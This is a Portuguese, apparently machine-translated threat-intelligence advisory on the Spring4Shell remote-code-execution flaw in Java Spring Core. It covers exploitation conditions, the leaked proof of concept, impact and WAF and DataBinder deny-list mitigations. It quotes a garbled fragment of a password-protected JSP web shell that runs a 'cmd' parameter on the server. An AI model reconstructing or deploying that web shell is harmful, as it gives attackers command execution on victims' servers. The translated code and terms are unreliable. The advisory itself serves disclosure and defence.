Vulnerabilidade de dia zero do Java Spring Core não corrigida: “Spring4Shell”
Categoria: Inteligência de vulnerabilidade Classe de vulnerabilidade: Execução remota de código ID CVE: A ser atribuído CVSS:3.0 Pontuação: A ser atribuído Spring4Shell — Resumo executivo Uma nova vulnerabilidade crítica de dia zero na popular estrutura Spring para Java ganhou destaque quando sua exploração foi publicada pela primeira vez por um pesquisador de segurança chinês “heige” no Twitter (@80vul). Mais tarde, foi confirmado que um [...]
Updated on
April 17, 2026
Published on
March 31, 2022
Read MINUTES
5
Subscribe to the latest industry news, threats and resources.
Categoria: Inteligência de vulnerabilidadeClasse de vulnerabilidade: Execução remota de códigoID DA CAVERNA:A ser atribuídoCVSS: 3.0 Pontuação:A ser atribuído
Spring 4 Shell - Sumário executivo
Uma nova vulnerabilidade crítica de dia zero na popular estrutura Spring para Java ganhou destaque quando sua exploração foi publicada pela primeira vez por um pesquisador de segurança chinês “heige” no Twitter (@80vul).
Posteriormente, foi confirmado que um desvio lançado para uma vulnerabilidade mais antiga, a CVE-2010-1622, afeta o Spring Core no JDK9+, permitindo que o invasor execute a execução remota de código nos sistemas vulneráveis.
Anteriormente, um cenário de ataque semelhante foi observado quando os servidores Log4j foram amplamente explorados em dezembro de 2021, para realizar ataques de ransomware em grande escala.
Tweet excluído do pesquisador de segurança chinês que publicou pela primeira vez o exploit para o Spring4Shell
Análise
Sobre Spring FrameworkO Spring Framework é uma estrutura de aplicativos de código aberto que fornece suporte de infraestrutura para o desenvolvimento de aplicativos Java. O Spring é a estrutura Java leve e de código aberto mais popular do mundo, que facilita o ciclo de desenvolvimento de aplicativos corporativos Java para desenvolvedores. Java, Spring Boot, Auth0, Bugsnag e Java EE são algumas das ferramentas populares que se integram ao Spring. 544 empresas supostamente usam o Spring em suas tecnologias, incluindo Accenture e Zalando.ExploraçãoPara explorar com êxito a vulnerabilidade, o DataBinder deve estar ativado. Em alguns casos, tudo o que um invasor precisa fazer é enviar uma solicitação HTTP especialmente criada para um sistema vulnerável para explorar a vulnerabilidade. Por outro lado, a exploração de certas outras configurações requer pesquisas extras para desenvolver uma carga útil eficaz.
Sobre a exploração bem-sucedidaOs agentes de ameaças podem aproveitar essas explorações para executar comandos no servidor, concedendo-lhes acesso inicial ao dispositivo.Digitalização em massaOs agentes de ameaças poderão criar scripts que rastreiam a Internet e exploram automaticamente servidores suscetíveis, pois a exploração envolve apenas um simples HTTP POST para um aplicativo vulnerável.Nota: A vulnerabilidade de dia zero do Java Spring Core, também apelidada de “Spring4Shell”, não está relacionada às outras vulnerabilidades divulgadas na estrutura Spring nesta semana, incluindo a vulnerabilidade DoS (CVE-2022-22950) e a vulnerabilidade de acesso a recursos de expressão do Spring Cloud (CVE-2022-22963).
Infográfico explicando as recentes vulnerabilidades do Java Spring Fonte: Twitter
Informações da OSINT
As várias postagens relacionadas ao exploit lançado para o Spring4Shell estão listadas a seguir:
O PoC vazado por”olá exp”, que parecia permitir que invasores não autenticados executassem código nos sistemas de destino, foi posteriormente excluído.
O PoC vazado por”olá exp”, que parecia permitir que invasores não autenticados executassem código nos sistemas de destino, foi posteriormente excluído.O PoC, lançado anteriormente pelo pesquisador chinês, foi compartilhado novamente por uma página do Twitter. vx underground:Informações publicadas em um Site chinês de cibersegurança
Essa carga coloca um shell web protegido por senha no diretório raiz do Tomcat chamadotomcatwar.jsp
- if (“j” .equals (request.getParameter (“pwd”))) {java.io.inputStream in = -.getRuntime () .exec (request.getParameter (“cmd”)) .getInputStream (); int a = -1; byte [] b = novo byte [2048]; while ((a=in.read (b)) 3D-1) {out. println (nova string (b));}} -
Essa carga útil específica do servidor Tomcat altera as propriedades de registro do servidor Tomcat via ClassLoader. O payload simplesmente redireciona a lógica de registro para o diretório ROOT e descarta o arquivo + payload.
Spring 4 Shell - Impacto: quem e o quê
Figura: Popularidade dos servidores de aplicativos em todo o mundo. Aqui, o Apache Tomcat usando o Spring Framework tem a melhor classificação. (Fonte:Jetbrains)
Os usuários que executam o JDK versão 9 e mais recente estão vulneráveis a um ataque RCE. Além disso, diz-se que todas as versões do Spring Core foram afetadas.
No momento, não há nenhum patch oficial da primavera. Portanto, os agentes de ameaças podem aproveitar essa vulnerabilidade para atuar execução remota não autorizada de código. Devido à facilidade de exploração, os agentes da ameaça podem realizar atividades de exploração em grande escala semelhante ao Log4j. Os atacantes podem explorar a vulnerabilidade para realizar ataques de malware ou ransomware em uma organização
Mitigação
No Spring Framework, o DataBinder tem a funcionalidade de proibir certos padrões. Como mitigação temporária dessa vulnerabilidade, o Conselhos para controladores um componente pode ser criado (que é um componente Spring compartilhado entre os Controllers) e padrões perigosos podem ser adicionados à lista de negação.
Em dispositivos de proteção de rede, como WAF, implemente a filtragem de regras para cadeias de caracteres como “class.*”, “Class.*”, “*.class.*” e “*.Class.*” de acordo com a situação real do tráfego dos serviços implantados. Isso ocorre porque o “Spring4Shell” aproveita a injeção de classe (muito severa)
Por fim, deve-se ficar atualizado sobre a versão mais recente dos patches oficiais da Spring e corrigir as vulnerabilidades de acordo com esses patches.
More information and context about Underground Chatter
On-Demand Research Services
Global Threat Intelligence Feed
Protect and proceed with Actionable Intelligence
The Global Cyber Threat Intelligence Feed is an innovative platform that gathers information from various sources to help businesses and organizations stay ahead of potential cyber-attacks. This feed provides real-time updates on cyber threats, including malware, phishing scams, and other forms of cybercrime.